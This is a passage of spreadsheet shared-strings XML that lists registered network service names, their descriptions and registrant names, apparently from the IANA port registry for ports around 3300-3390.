    <t>[Sri_Subramaniam]</t>
  </si>
  <si>
    <t>h2gf-w-2m</t>
  </si>
  <si>
    <t>H2GF W.2m Handover prot.</t>
  </si>
  <si>
    <t>[Arne_Norefors]</t>
  </si>
  <si>
    <t>mc-brk-srv</t>
  </si>
  <si>
    <t>Millicent Broker Server</t>
  </si>
  <si>
    <t>bmcpatrolagent</t>
  </si>
  <si>
    <t>BMC Patrol Agent</t>
  </si>
  <si>
    <t>bmcpatrolrnvu</t>
  </si>
  <si>
    <t>BMC Patrol Rendezvous</t>
  </si>
  <si>
    <t>cops-tls</t>
  </si>
  <si>
    <t>COPS/TLS</t>
  </si>
  <si>
    <t>[Mark_Stevens]</t>
  </si>
  <si>
    <t>apogeex-port</t>
  </si>
  <si>
    <t>ApogeeX Port</t>
  </si>
  <si>
    <t>[Tom_Nys]</t>
  </si>
  <si>
    <t>smpppd</t>
  </si>
  <si>
    <t>SuSE Meta PPPD</t>
  </si>
  <si>
    <t>[Arvin_Schnell]</t>
  </si>
  <si>
    <t>iiw-port</t>
  </si>
  <si>
    <t>IIW Monitor User Port</t>
  </si>
  <si>
    <t>[Corey_Burnett]</t>
  </si>
  <si>
    <t>odi-port</t>
  </si>
  <si>
    <t>Open Design Listen Port</t>
  </si>
  <si>
    <t>[Phivos_Aristides]</t>
  </si>
  <si>
    <t>brcm-comm-port</t>
  </si>
  <si>
    <t>Broadcom Port</t>
  </si>
  <si>
    <t>[Thomas_L_Johnson]</t>
  </si>
  <si>
    <t>pcle-infex</t>
  </si>
  <si>
    <t>Pinnacle Sys InfEx Port</t>
  </si>
  <si>
    <t>[Anthon_van_der_Neut]</t>
  </si>
  <si>
    <t>csvr-proxy</t>
  </si>
  <si>
    <t>ConServR Proxy</t>
  </si>
  <si>
    <t>csvr-sslproxy</t>
  </si>
  <si>
    <t>ConServR SSL Proxy</t>
  </si>
  <si>
    <t>[Mikhail_Kruk]</t>
  </si>
  <si>
    <t>firemonrcc</t>
  </si>
  <si>
    <t>FireMon Revision Control</t>
  </si>
  <si>
    <t>[Michael_Bishop]</t>
  </si>
  <si>
    <t>spandataport</t>
  </si>
  <si>
    <t>SpanDataPort</t>
  </si>
  <si>
    <t>[Jesse_McKay]</t>
  </si>
  <si>
    <t>magbind</t>
  </si>
  <si>
    <t>Rockstorm MAG protocol</t>
  </si>
  <si>
    <t>[Jens_Nilsson]</t>
  </si>
  <si>
    <t>ncu-1</t>
  </si>
  <si>
    <t>Network Control Unit</t>
  </si>
  <si>
    <t>ncu-2</t>
  </si>
  <si>
    <t>[Charlie_Hundre]</t>
  </si>
  <si>
    <t>embrace-dp-s</t>
  </si>
  <si>
    <t>Embrace Device Protocol Server</t>
  </si>
  <si>
    <t>embrace-dp-c</t>
  </si>
  <si>
    <t>Embrace Device Protocol Client</t>
  </si>
  <si>
    <t>[Elliot_Schwartz]</t>
  </si>
  <si>
    <t>dmod-workspace</t>
  </si>
  <si>
    <t>DMOD WorkSpace</t>
  </si>
  <si>
    <t>[Nick_Plante]</t>
  </si>
  <si>
    <t>tick-port</t>
  </si>
  <si>
    <t>Press-sense Tick Port</t>
  </si>
  <si>
    <t>[Boris_Svetlitsky]</t>
  </si>
  <si>
    <t>cpq-tasksmart</t>
  </si>
  <si>
    <t>CPQ-TaskSmart</t>
  </si>
  <si>
    <t>[Jackie_Lau]</t>
  </si>
  <si>
    <t>intraintra</t>
  </si>
  <si>
    <t>IntraIntra</t>
  </si>
  <si>
    <t>[Matthew_Asham]</t>
  </si>
  <si>
    <t>netwatcher-mon</t>
  </si>
  <si>
    <t>Network Watcher Monitor</t>
  </si>
  <si>
    <t>netwatcher-db</t>
  </si>
  <si>
    <t>Network Watcher DB Access</t>
  </si>
  <si>
    <t>[Hirokazu_Fujisawa]</t>
  </si>
  <si>
    <t>isns</t>
  </si>
  <si>
    <t>iSNS Server Port</t>
  </si>
  <si>
    <t>[RFC4171]</t>
  </si>
  <si>
    <t>ironmail</t>
  </si>
  <si>
    <t>IronMail POP Proxy</t>
  </si>
  <si>
    <t>[Mike_Hudack]</t>
  </si>
  <si>
    <t>vx-auth-port</t>
  </si>
  <si>
    <t>Veritas Authentication Port</t>
  </si>
  <si>
    <t>[Senthil_Ponnuswamy]</t>
  </si>
  <si>
    <t>pfu-prcallback</t>
  </si>
  <si>
    <t>PFU PR Callback</t>
  </si>
  <si>
    <t>[Tetsuharu_Hanada]</t>
  </si>
  <si>
    <t>netwkpathengine</t>
  </si>
  <si>
    <t>HP OpenView Network Path Engine Server</t>
  </si>
  <si>
    <t>[Anthony_Walker]</t>
  </si>
  <si>
    <t>flamenco-proxy</t>
  </si>
  <si>
    <t>Flamenco Networks Proxy</t>
  </si>
  <si>
    <t>[Corey_Corrick]</t>
  </si>
  <si>
    <t>avsecuremgmt</t>
  </si>
  <si>
    <t>Avocent Secure Management</t>
  </si>
  <si>
    <t>[Brian_S_Stewart]</t>
  </si>
  <si>
    <t>surveyinst</t>
  </si>
  <si>
    <t>Survey Instrument</t>
  </si>
  <si>
    <t>[Al_Amet]</t>
  </si>
  <si>
    <t>neon24x7</t>
  </si>
  <si>
    <t>NEON 24X7 Mission Control</t>
  </si>
  <si>
    <t>[Tony_Lubrano]</t>
  </si>
  <si>
    <t>jmq-daemon-1</t>
  </si>
  <si>
    <t>JMQ Daemon Port 1</t>
  </si>
  <si>
    <t>jmq-daemon-2</t>
  </si>
  <si>
    <t>JMQ Daemon Port 2</t>
  </si>
  <si>
    <t>[Martin_West]</t>
  </si>
  <si>
    <t>ferrari-foam</t>
  </si>
  <si>
    <t>Ferrari electronic FOAM</t>
  </si>
  <si>
    <t>[Johann_Deutinger]</t>
  </si>
  <si>
    <t>unite</t>
  </si>
  <si>
    <t>Unified IP &amp; Telecom Environment</t>
  </si>
  <si>
    <t>[Christer_Gunnarsson]</t>
  </si>
  <si>
    <t>smartpackets</t>
  </si>
  <si>
    <t>EMC SmartPackets</t>
  </si>
  <si>
    <t>[Steve_Spataro]</t>
  </si>
  <si>
    <t>wms-messenger</t>
  </si>
  <si>
    <t>WMS Messenger</t>
  </si>
  <si>
    <t>[Michael_Monasterio]</t>
  </si>
  <si>
    <t>xnm-ssl</t>
  </si>
  <si>
    <t>XML NM over SSL</t>
  </si>
  <si>
    <t>xnm-clear-text</t>
  </si>
  <si>
    <t>XML NM over TCP</t>
  </si>
  <si>
    <t>[Mark_Trostler]</t>
  </si>
  <si>
    <t>glbp</t>
  </si>
  <si>
    <t>Gateway Load Balancing Pr</t>
  </si>
  <si>
    <t>[Douglas_McLaggan]</t>
  </si>
  <si>
    <t>digivote</t>
  </si>
  <si>
    <t>DIGIVOTE (R) Vote-Server</t>
  </si>
  <si>
    <t>[Christian_Treczoks]</t>
  </si>
  <si>
    <t>aes-discovery</t>
  </si>
  <si>
    <t>AES Discovery Port</t>
  </si>
  <si>
    <t>[Ken_Richard]</t>
  </si>
  <si>
    <t>fcip-port</t>
  </si>
  <si>
    <t>FCIP</t>
  </si>
  <si>
    <t>[RFC3821]</t>
  </si>
  <si>
    <t>isi-irp</t>
  </si>
  <si>
    <t>ISI Industry Software IRP</t>
  </si>
  <si>
    <t>[Peter_Sandstrom]</t>
  </si>
  <si>
    <t>dwnmshttp</t>
  </si>
  <si>
    <t>DiamondWave NMS Server</t>
  </si>
  <si>
    <t>dwmsgserver</t>
  </si>
  <si>
    <t>DiamondWave MSG Server</t>
  </si>
  <si>
    <t>[Varma_Bhupatiraju]</t>
  </si>
  <si>
    <t>global-cd-port</t>
  </si>
  <si>
    <t>Global CD Port</t>
  </si>
  <si>
    <t>[Vitaly_Revsin_2]</t>
  </si>
  <si>
    <t>sftdst-port</t>
  </si>
  <si>
    <t>Software Distributor Port</t>
  </si>
  <si>
    <t>[Andrea_Lanza]</t>
  </si>
  <si>
    <t>vidigo</t>
  </si>
  <si>
    <t>VidiGo communication (previous was: Delta Solutions Direct)</t>
  </si>
  <si>
    <t>[Peter_Ijkhout]</t>
  </si>
  <si>
    <t>mdtp</t>
  </si>
  <si>
    <t>MDT port</t>
  </si>
  <si>
    <t>[RFC6513]</t>
  </si>
  <si>
    <t>whisker</t>
  </si>
  <si>
    <t>WhiskerControl main port</t>
  </si>
  <si>
    <t>[Rudolf_Cardinal]</t>
  </si>
  <si>
    <t>alchemy</t>
  </si>
  <si>
    <t>Alchemy Server</t>
  </si>
  <si>
    <t>[Mikhail_Belov]</t>
  </si>
  <si>
    <t>mdap-port</t>
  </si>
  <si>
    <t>MDAP port</t>
  </si>
  <si>
    <t>[Johan_Deleu]</t>
  </si>
  <si>
    <t>MDAP Port</t>
  </si>
  <si>
    <t>apparenet-ts</t>
  </si>
  <si>
    <t>appareNet Test Server</t>
  </si>
  <si>
    <t>apparenet-tps</t>
  </si>
  <si>
    <t>appareNet Test Packet Sequencer</t>
  </si>
  <si>
    <t>apparenet-as</t>
  </si>
  <si>
    <t>appareNet Analysis Server</t>
  </si>
  <si>
    <t>apparenet-ui</t>
  </si>
  <si>
    <t>appareNet User Interface</t>
  </si>
  <si>
    <t>[Fred_Klassen]</t>
  </si>
  <si>
    <t>triomotion</t>
  </si>
  <si>
    <t>Trio Motion Control Port</t>
  </si>
  <si>
    <t>[Tony_Matthews]</t>
  </si>
  <si>
    <t>sysorb</t>
  </si>
  <si>
    <t>SysOrb Monitoring Server</t>
  </si>
  <si>
    <t>[Jakob_Oestergaard]</t>
  </si>
  <si>
    <t>sdp-id-port</t>
  </si>
  <si>
    <t>Session Description ID</t>
  </si>
  <si>
    <t>[Greg_Rose_2]</t>
  </si>
  <si>
    <t>timelot</t>
  </si>
  <si>
    <t>Timelot Port</t>
  </si>
  <si>
    <t>[David_Ferguson]</t>
  </si>
  <si>
    <t>onesaf</t>
  </si>
  <si>
    <t>OneSAF</t>
  </si>
  <si>
    <t>[Gene_McCulley]</t>
  </si>
  <si>
    <t>vieo-fe</t>
  </si>
  <si>
    <t>VIEO Fabric Executive</t>
  </si>
  <si>
    <t>[James_Cox]</t>
  </si>
  <si>
    <t>dvt-system</t>
  </si>
  <si>
    <t>DVT SYSTEM PORT</t>
  </si>
  <si>
    <t>dvt-data</t>
  </si>
  <si>
    <t>DVT DATA LINK</t>
  </si>
  <si>
    <t>[Phillip_Heil]</t>
  </si>
  <si>
    <t>procos-lm</t>
  </si>
  <si>
    <t>PROCOS LM</t>
  </si>
  <si>
    <t>[Torsten_Rendelmann]</t>
  </si>
  <si>
    <t>ssp</t>
  </si>
  <si>
    <t>State Sync Protocol</t>
  </si>
  <si>
    <t>[Stephane_Beaulieu]</t>
  </si>
  <si>
    <t>hicp</t>
  </si>
  <si>
    <t>HMS hicp port</t>
  </si>
  <si>
    <t>[Joel_Palsson]</t>
  </si>
  <si>
    <t>sysscanner</t>
  </si>
  <si>
    <t>Sys Scanner</t>
  </si>
  <si>
    <t>[Dick_Georges]</t>
  </si>
  <si>
    <t>dhe</t>
  </si>
  <si>
    <t>DHE port</t>
  </si>
  <si>
    <t>[Fabrizio_Massimo_Fer]</t>
  </si>
  <si>
    <t>pda-data</t>
  </si>
  <si>
    <t>PDA Data</t>
  </si>
  <si>
    <t>pda-sys</t>
  </si>
  <si>
    <t>PDA System</t>
  </si>
  <si>
    <t>[Jian_Fan]</t>
  </si>
  <si>
    <t>semaphore</t>
  </si>
  <si>
    <t>Semaphore Connection Port</t>
  </si>
  <si>
    <t>[Jay_Eckles]</t>
  </si>
  <si>
    <t>cpqrpm-agent</t>
  </si>
  <si>
    <t>Compaq RPM Agent Port</t>
  </si>
  <si>
    <t>cpqrpm-server</t>
  </si>
  <si>
    <t>Compaq RPM Server Port</t>
  </si>
  <si>
    <t>[Royal_King]</t>
  </si>
  <si>
    <t>ivecon-port</t>
  </si>
  <si>
    <t>Ivecon Server Port</t>
  </si>
  <si>
    <t>[Serguei_Tevs]</t>
  </si>
  <si>
    <t>epncdp2</t>
  </si>
  <si>
    <t>Epson Network Common Devi</t>
  </si>
  <si>
    <t>[Oishi_Toshiaki]</t>
  </si>
  <si>
    <t>iscsi-target</t>
  </si>
  <si>
    <t>iSCSI port</t>
  </si>
  <si>
    <t>winshadow</t>
  </si>
  <si>
    <t>winShadow</t>
  </si>
  <si>
    <t>[Colin_Barry]</t>
  </si>
  <si>
    <t>necp</t>
  </si>
  <si>
    <t>NECP</t>
  </si>
  <si>
    <t>[Alberto_Cerpa]</t>
  </si>
  <si>
    <t>ecolor-imager</t>
  </si>
  <si>
    <t>E-Color Enterprise Imager</t>
  </si>
  <si>
    <t>[Tamara_Baker]</t>
  </si>
  <si>
    <t>ccmail</t>
  </si>
  <si>
    <t>cc:mail/lotus</t>
  </si>
  <si>
    <t>[brockman]</t>
  </si>
  <si>
    <t>altav-tunnel</t>
  </si>
  <si>
    <t>Altav Tunnel</t>
  </si>
  <si>
    <t>ns-cfg-server</t>
  </si>
  <si>
    <t>NS CFG Server</t>
  </si>
  <si>
    <t>[Aivi_Lie]</t>
  </si>
  <si>
    <t>ibm-dial-out</t>
  </si>
  <si>
    <t>IBM Dial Out</t>
  </si>
  <si>
    <t>[Skip_Booth]</t>
  </si>
  <si>
    <t>msft-gc</t>
  </si>
  <si>
    <t>Microsoft Global Catalog</t>
  </si>
  <si>
    <t>msft-gc-ssl</t>
  </si>
  <si>
    <t>Microsoft Global Catalog with LDAP/SSL</t>
  </si>
  <si>
    <t>[Asaf_Kashi]</t>
  </si>
  <si>
    <t>verismart</t>
  </si>
  <si>
    <t>Verismart</t>
  </si>
  <si>
    <t>[Jay_Weber]</t>
  </si>
  <si>
    <t>csoft-prev</t>
  </si>
  <si>
    <t>CSoft Prev Port</t>
  </si>
  <si>
    <t>[Nedelcho_Stanev_3]</t>
  </si>
  <si>
    <t>user-manager</t>
  </si>
  <si>
    <t>Fujitsu User Manager</t>
  </si>
  <si>
    <t>[Yukihiko_Sakurai]</t>
  </si>
  <si>
    <t>sxmp</t>
  </si>
  <si>
    <t>Simple Extensible Multiplexed Protocol</t>
  </si>
  <si>
    <t>ordinox-server</t>
  </si>
  <si>
    <t>Ordinox Server</t>
  </si>
  <si>
    <t>[Denis_Ducharme]</t>
  </si>
  <si>
    <t>samd</t>
  </si>
  <si>
    <t>SAMD</t>
  </si>
  <si>
    <t>[Edgar_Circenis]</t>
  </si>
  <si>
    <t>maxim-asics</t>
  </si>
  <si>
    <t>Maxim ASICs</t>
  </si>
  <si>
    <t>[Dave_Inman]</t>
  </si>
  <si>
    <t>awg-proxy</t>
  </si>
  <si>
    <t>AWG Proxy</t>
  </si>
  <si>
    <t>[Alex_McDonald]</t>
  </si>
  <si>
    <t>lkcmserver</t>
  </si>
  <si>
    <t>LKCM Server</t>
  </si>
  <si>
    <t>[Javier_Jimenez]</t>
  </si>
  <si>
    <t>admind</t>
  </si>
  <si>
    <t>[Jeff_Haynes]</t>
  </si>
  <si>
    <t>vs-server</t>
  </si>
  <si>
    <t>VS Server</t>
  </si>
  <si>
    <t>[Scott_Godlew]</t>
  </si>
  <si>
    <t>sysopt</t>
  </si>
  <si>
    <t>SYSOPT</t>
  </si>
  <si>
    <t>[Tony_Hoffman]</t>
  </si>
  <si>
    <t>datusorb</t>
  </si>
  <si>
    <t>Datusorb</t>
  </si>
  <si>
    <t>[Thomas_Martin]</t>
  </si>
  <si>
    <t>Apple Remote Desktop (Net Assistant)</t>
  </si>
  <si>
    <t>Net Assistant</t>
  </si>
  <si>
    <t>[Michael_Stein]</t>
  </si>
  <si>
    <t>4talk</t>
  </si>
  <si>
    <t>4Talk</t>
  </si>
  <si>
    <t>[Tony_Bushnell]</t>
  </si>
  <si>
    <t>plato</t>
  </si>
  <si>
    <t>Plato</t>
  </si>
  <si>
    <t>[Jim_Battin]</t>
  </si>
  <si>
    <t>e-net</t>
  </si>
  <si>
    <t>E-Net</t>
  </si>
  <si>
    <t>[Steven_Grigsby]</t>
  </si>
  <si>
    <t>directvdata</t>
  </si>
  <si>
    <t>DIRECTVDATA</t>
  </si>
  <si>
    <t>[Michael_Friedman]</t>
  </si>
  <si>
    <t>cops</t>
  </si>
  <si>
    <t>COPS</t>
  </si>
  <si>
    <t>enpc</t>
  </si>
  <si>
    <t>ENPC</t>
  </si>
  <si>
    <t>[SEIKO_EPSON_2]</t>
  </si>
  <si>
    <t>caps-lm</t>
  </si>
  <si>
    <t>CAPS LOGISTICS TOOLKIT - LM</t>
  </si>
  <si>
    <t>[Joseph_Krebs]</t>
  </si>
  <si>
    <t>sah-lm</t>
  </si>
  <si>
    <t>S A Holditch &amp; Associates - LM</t>
  </si>
  <si>
    <t>[Randy_Hudgens]</t>
  </si>
  <si>
    <t>cart-o-rama</t>
  </si>
  <si>
    <t>Cart O Rama</t>
  </si>
  <si>
    <t>[Phillip_Dillinger]</t>
  </si>
  <si>
    <t>fg-fps</t>
  </si>
  <si>
    <t>fg-gip</t>
  </si>
  <si>
    <t>[Jean_Marc_Frailong]</t>
  </si>
  <si>
    <t>dyniplookup</t>
  </si>
  <si>
    <t>Dynamic IP Lookup</t>
  </si>
  <si>
    <t>[Eugene_Osovetsky]</t>
  </si>
  <si>
    <t>rib-slm</t>
  </si>
  <si>
    <t>Rib License Manager</t>
  </si>
  <si>
    <t>[Kristean_Heisler]</t>
  </si>
  <si>
    <t>cytel-lm</t>
  </si>
  <si>
    <t>Cytel License Manager</t>
  </si>
  <si>
    <t>[Yogesh_P_Gajjar]</t>
  </si>
  <si>
    <t>deskview</t>
  </si>
  <si>
    <t>DeskView</t>
  </si>
  <si>
    <t>[Manfred_Randelzofer]</t>
  </si>
  <si>
    <t>pdrncs</t>
  </si>
  <si>
    <t>[Paul_Wissenbach]</t>
  </si>
  <si>
    <t>ceph</t>
  </si>
  <si>
    <t>Ceph monitor</t>
  </si>
  <si>
    <t>[Sage_Weil]</t>
  </si>
  <si>
    <t>Knwon Unauthorized Use on 3300-3301</t>
  </si>
  <si>
    <t>mcs-fastmail</t>
  </si>
  <si>
    <t>MCS Fastmail</t>
  </si>
  <si>
    <t>[Patti_Jo_Newsom]</t>
  </si>
  <si>
    <t>opsession-clnt</t>
  </si>
  <si>
    <t>OP Session Client</t>
  </si>
  <si>
    <t>opsession-srvr</t>
  </si>
  <si>
    <t>OP Session Server</t>
  </si>
  <si>
    <t>odette-ftp</t>
  </si>
  <si>
    <t>ODETTE-FTP</t>
  </si>
  <si>
    <t>[David_Nash]</t>
  </si>
  <si>
    <t>[RFC5024]</t>
  </si>
  <si>
    <t>MySQL</t>
  </si>
  <si>
    <t>[Monty]</t>
  </si>
  <si>
    <t>opsession-prxy</t>
  </si>
  <si>
    <t>OP Session Proxy</t>
  </si>
  <si>
    <t>tns-server</t>
  </si>
  <si>
    <t>TNS Server</t>
  </si>
  <si>
    <t>tns-adv</t>
  </si>
  <si>
    <t>TNS ADV</t>
  </si>
  <si>
    <t>dyna-access</t>
  </si>
  <si>
    <t>Dyna Access</t>
  </si>
  <si>
    <t>[Dave_Belliveau]</t>
  </si>
  <si>
    <t>mcns-tel-ret</t>
  </si>
  <si>
    <t>MCNS Tel Ret</t>
  </si>
  <si>
    <t>[Randall_Atkinson]</t>
  </si>
  <si>
    <t>appman-server</t>
  </si>
  <si>
    <t>Application Management Server</t>
  </si>
  <si>
    <t>uorb</t>
  </si>
  <si>
    <t>Unify Object Broker</t>
  </si>
  <si>
    <t>uohost</t>
  </si>
  <si>
    <t>Unify Object Host</t>
  </si>
  <si>
    <t>cdid</t>
  </si>
  <si>
    <t>CDID</t>
  </si>
  <si>
    <t>[Andrew_Borisov]</t>
  </si>
  <si>
    <t>aicc-cmi</t>
  </si>
  <si>
    <t>AICC/CMI</t>
  </si>
  <si>
    <t>[William_McDonald]</t>
  </si>
  <si>
    <t>vsaiport</t>
  </si>
  <si>
    <t>VSAI PORT</t>
  </si>
  <si>
    <t>[Rieko_Asai]</t>
  </si>
  <si>
    <t>ssrip</t>
  </si>
  <si>
    <t>Swith to Swith Routing Information Protocol</t>
  </si>
  <si>
    <t>[Baba_Hidekazu]</t>
  </si>
  <si>
    <t>sdt-lmd</t>
  </si>
  <si>
    <t>SDT License Manager</t>
  </si>
  <si>
    <t>[Salvo_Nassisi]</t>
  </si>
  <si>
    <t>officelink2000</t>
  </si>
  <si>
    <t>Office Link 2000</t>
  </si>
  <si>
    <t>[Mike_Balch]</t>
  </si>
  <si>
    <t>vnsstr</t>
  </si>
  <si>
    <t>VNSSTR</t>
  </si>
  <si>
    <t>[Takeshi_Ohmura]</t>
  </si>
  <si>
    <t>active-net</t>
  </si>
  <si>
    <t>3322-3325</t>
  </si>
  <si>
    <t>Active Networks</t>
  </si>
  <si>
    <t>sftu</t>
  </si>
  <si>
    <t>SFTU</t>
  </si>
  <si>
    <t>[Eduardo_Rosenberg_de]</t>
  </si>
  <si>
    <t>bbars</t>
  </si>
  <si>
    <t>BBARS</t>
  </si>
  <si>
    <t>[Lou_Harris]</t>
  </si>
  <si>
    <t>egptlm</t>
  </si>
  <si>
    <t>Eaglepoint License Manager</t>
  </si>
  <si>
    <t>[Dave_Benton]</t>
  </si>
  <si>
    <t>hp-device-disc</t>
  </si>
  <si>
    <t>HP Device Disc</t>
  </si>
  <si>
    <t>[Shivaun_Albright]</t>
  </si>
  <si>
    <t>mcs-calypsoicf</t>
  </si>
  <si>
    <t>MCS Calypso ICF</t>
  </si>
  <si>
    <t>mcs-messaging</t>
  </si>
  <si>
    <t>MCS Messaging</t>
  </si>
  <si>
    <t>mcs-mailsvr</t>
  </si>
  <si>
    <t>MCS Mail Server</t>
  </si>
  <si>
    <t>dec-notes</t>
  </si>
  <si>
    <t>DEC Notes</t>
  </si>
  <si>
    <t>[Kim_Moraros]</t>
  </si>
  <si>
    <t>directv-web</t>
  </si>
  <si>
    <t>Direct TV Webcasting</t>
  </si>
  <si>
    <t>directv-soft</t>
  </si>
  <si>
    <t>Direct TV Software Updates</t>
  </si>
  <si>
    <t>directv-tick</t>
  </si>
  <si>
    <t>Direct TV Tickers</t>
  </si>
  <si>
    <t>directv-catlg</t>
  </si>
  <si>
    <t>Direct TV Data Catalog</t>
  </si>
  <si>
    <t>anet-b</t>
  </si>
  <si>
    <t>OMF data b</t>
  </si>
  <si>
    <t>anet-l</t>
  </si>
  <si>
    <t>OMF data l</t>
  </si>
  <si>
    <t>anet-m</t>
  </si>
  <si>
    <t>OMF data m</t>
  </si>
  <si>
    <t>anet-h</t>
  </si>
  <si>
    <t>OMF data h</t>
  </si>
  <si>
    <t>webtie</t>
  </si>
  <si>
    <t>WebTIE</t>
  </si>
  <si>
    <t>[Kevin_Frender]</t>
  </si>
  <si>
    <t>ms-cluster-net</t>
  </si>
  <si>
    <t>MS Cluster Net</t>
  </si>
  <si>
    <t>[David_Dion]</t>
  </si>
  <si>
    <t>bnt-manager</t>
  </si>
  <si>
    <t>BNT Manager</t>
  </si>
  <si>
    <t>[Engineering_Dept]</t>
  </si>
  <si>
    <t>influence</t>
  </si>
  <si>
    <t>Influence</t>
  </si>
  <si>
    <t>[Russ_Ferriday]</t>
  </si>
  <si>
    <t>trnsprntproxy</t>
  </si>
  <si>
    <t>Trnsprnt Proxy</t>
  </si>
  <si>
    <t>[Grant_Kirby]</t>
  </si>
  <si>
    <t>phoenix-rpc</t>
  </si>
  <si>
    <t>Phoenix RPC</t>
  </si>
  <si>
    <t>[Ian_Anderson]</t>
  </si>
  <si>
    <t>pangolin-laser</t>
  </si>
  <si>
    <t>Pangolin Laser</t>
  </si>
  <si>
    <t>[William_Benner]</t>
  </si>
  <si>
    <t>chevinservices</t>
  </si>
  <si>
    <t>Chevin Services</t>
  </si>
  <si>
    <t>[Gus_McNaughton]</t>
  </si>
  <si>
    <t>findviatv</t>
  </si>
  <si>
    <t>FINDVIATV</t>
  </si>
  <si>
    <t>[Oran_Davis]</t>
  </si>
  <si>
    <t>btrieve</t>
  </si>
  <si>
    <t>Btrieve port</t>
  </si>
  <si>
    <t>ssql</t>
  </si>
  <si>
    <t>Scalable SQL</t>
  </si>
  <si>
    <t>fatpipe</t>
  </si>
  <si>
    <t>FATPIPE</t>
  </si>
  <si>
    <t>[Sanchaita_Datta]</t>
  </si>
  <si>
    <t>suitjd</t>
  </si>
  <si>
    <t>SUITJD</t>
  </si>
  <si>
    <t>[Todd_Moyer]</t>
  </si>
  <si>
    <t>ordinox-dbase</t>
  </si>
  <si>
    <t>Ordinox Dbase</t>
  </si>
  <si>
    <t>upnotifyps</t>
  </si>
  <si>
    <t>UPNOTIFYPS</t>
  </si>
  <si>
    <t>[Mark_Fox]</t>
  </si>
  <si>
    <t>adtech-test</t>
  </si>
  <si>
    <t>Adtech Test IP</t>
  </si>
  <si>
    <t>[Robin_Uyeshiro]</t>
  </si>
  <si>
    <t>mpsysrmsvr</t>
  </si>
  <si>
    <t>Mp Sys Rmsvr</t>
  </si>
  <si>
    <t>wg-netforce</t>
  </si>
  <si>
    <t>WG NetForce</t>
  </si>
  <si>
    <t>[Lee_Wheat]</t>
  </si>
  <si>
    <t>kv-server</t>
  </si>
  <si>
    <t>KV Server</t>
  </si>
  <si>
    <t>kv-agent</t>
  </si>
  <si>
    <t>KV Agent</t>
  </si>
  <si>
    <t>[Thomas_Soranno]</t>
  </si>
  <si>
    <t>dj-ilm</t>
  </si>
  <si>
    <t>DJ ILM</t>
  </si>
  <si>
    <t>[Don_Tyson]</t>
  </si>
  <si>
    <t>nati-vi-server</t>
  </si>
  <si>
    <t>NATI Vi Server</t>
  </si>
  <si>
    <t>[Robert_Dye]</t>
  </si>
  <si>
    <t>Creative Server</t>
  </si>
  <si>
    <t>Content Server</t>
  </si>
  <si>
    <t>Creative Partner</t>
  </si>
  <si>
    <t>[Jesus_Ortiz_2]</t>
  </si>
  <si>
    <t>satvid-datalnk</t>
  </si>
  <si>
    <t>3367-3371</t>
  </si>
  <si>
    <t>Satellite Video Data Link</t>
  </si>
  <si>
    <t>[Scott_Engel]</t>
  </si>
  <si>
    <t>tip2</t>
  </si>
  <si>
    <t>TIP 2</t>
  </si>
  <si>
    <t>[Keith_Evans]</t>
  </si>
  <si>
    <t>lavenir-lm</t>
  </si>
  <si>
    <t>Lavenir License Manager</t>
  </si>
  <si>
    <t>[Marius_Matioc]</t>
  </si>
  <si>
    <t>cluster-disc</t>
  </si>
  <si>
    <t>Cluster Disc</t>
  </si>
  <si>
    <t>[Jeff_Hughes]</t>
  </si>
  <si>
    <t>vsnm-agent</t>
  </si>
  <si>
    <t>VSNM Agent</t>
  </si>
  <si>
    <t>[Venkat_Rangan]</t>
  </si>
  <si>
    <t>cdbroker</t>
  </si>
  <si>
    <t>CD Broker</t>
  </si>
  <si>
    <t>[Moon_Ho_Chung]</t>
  </si>
  <si>
    <t>cogsys-lm</t>
  </si>
  <si>
    <t>Cogsys Network License Manager</t>
  </si>
  <si>
    <t>[Simon_Chinnick]</t>
  </si>
  <si>
    <t>wsicopy</t>
  </si>
  <si>
    <t>WSICOPY</t>
  </si>
  <si>
    <t>[James_Overby]</t>
  </si>
  <si>
    <t>socorfs</t>
  </si>
  <si>
    <t>SOCORFS</t>
  </si>
  <si>
    <t>[Hugo_Charbonneau]</t>
  </si>
  <si>
    <t>sns-channels</t>
  </si>
  <si>
    <t>SNS Channels</t>
  </si>
  <si>
    <t>[Shekar_Pasumarthi]</t>
  </si>
  <si>
    <t>geneous</t>
  </si>
  <si>
    <t>Geneous</t>
  </si>
  <si>
    <t>[Nick_de_Smith]</t>
  </si>
  <si>
    <t>fujitsu-neat</t>
  </si>
  <si>
    <t>Fujitsu Network Enhanced Antitheft function</t>
  </si>
  <si>
    <t>[Markku_Viima]</t>
  </si>
  <si>
    <t>esp-lm</t>
  </si>
  <si>
    <t>Enterprise Software Products License Manager</t>
  </si>
  <si>
    <t>[George_Rudy]</t>
  </si>
  <si>
    <t>hp-clic</t>
  </si>
  <si>
    <t>Cluster Management Services</t>
  </si>
  <si>
    <t>[Rajesh_Srinivasaragh]</t>
  </si>
  <si>
    <t>Hardware Management</t>
  </si>
  <si>
    <t>qnxnetman</t>
  </si>
  <si>
    <t>[Michael_Hunter]</t>
  </si>
  <si>
    <t>gprs-data</t>
  </si>
  <si>
    <t>GPRS Data</t>
  </si>
  <si>
    <t>gprs-sig</t>
  </si>
  <si>
    <t>GPRS SIG</t>
  </si>
  <si>
    <t>[Ansgar_Bergmann]</t>
  </si>
  <si>
    <t>backroomnet</t>
  </si>
  <si>
    <t>Back Room Net</t>
  </si>
  <si>
    <t>[Clayton_Wilkinson]</t>
  </si>
  <si>
    <t>cbserver</t>
  </si>
  <si>
    <t>CB Server</t>
  </si>
  <si>
    <t>[Allen_Wei]</t>
  </si>
  <si>
    <t>ms-wbt-server</t>
  </si>
  <si>
    <t>MS WBT Server</t>
  </si>
  <si>
    <t>[Ritu_Bahl]</t>
  </si>
  <si>
    <t>dsc</t>
  </si>
  <si>
    <t>Distributed Service Coordinator</t>
  </si>
  <si>
    <t>[Charles_Honton]</t>
  </si>
  <si>
    <t>savant</t>
  </si>
  <si>
    <t>SAVANT</t>
  </si>
  <si>
    <t>[Andy_Bruce]</t>
  </si>
  <si>
    <t>efi-lm</t>
  </si>
  <si>
    <t>EFI License Management</t>
  </si>
  <si>
    <t>[Ross_E_Greinke]</t>
  </si>
  <si>
    <t>d2k-tapestry1</t>
  </si>
  <si>
    <t>D2K Tapestry Client to Server</t>
  </si>
  <si>
    <t>d2k-tapestry2</t>
  </si>
  <si>
    <t>D2K Tapestry Server to Server</t>
  </si>
  <si>
    <t>dyna-lm</t>
  </si>
  <si>
    <t>Dyna License Manager (Elam)</t>
  </si>
  <si>
    <t>[Anjana_Iyer]</t>
  </si>
  <si>
    <t>printer-agent</t>
  </si>
  <si>
    <t>Printer Agent
